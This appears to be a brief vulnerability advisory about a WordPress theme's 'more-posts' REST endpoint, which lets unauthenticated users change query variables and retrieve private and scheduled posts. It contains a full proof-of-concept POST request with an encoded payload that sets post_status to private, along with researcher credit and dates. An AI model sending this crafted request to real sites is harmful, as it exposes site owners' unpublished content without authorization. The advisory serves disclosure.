The theme allows unauthenticated users to manipulate the query_vars used to retrieve the posts to display in one of its REST endpoint, without any validation. As a result, private and scheduled posts could be retrieved via a crafted request.
POST /wp-json/csco/v1/more-posts Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 186 action=csco_ajax_load_more&page=1&posts_per_page=10&query_data=%7b%22location%22%3a%22%22%2c%22infinite_load%22%3afalse%2c%22query_vars%22%3a%7b%22post_status%22%3a%20%22private%22%7d%7d
Emil Kylander Edwartz
Emil Kylander Edwartz
Yes
2021-10-11 (about 1 years ago)
2021-10-11 (about 1 years ago)
2022-04-08 (about 1 years ago)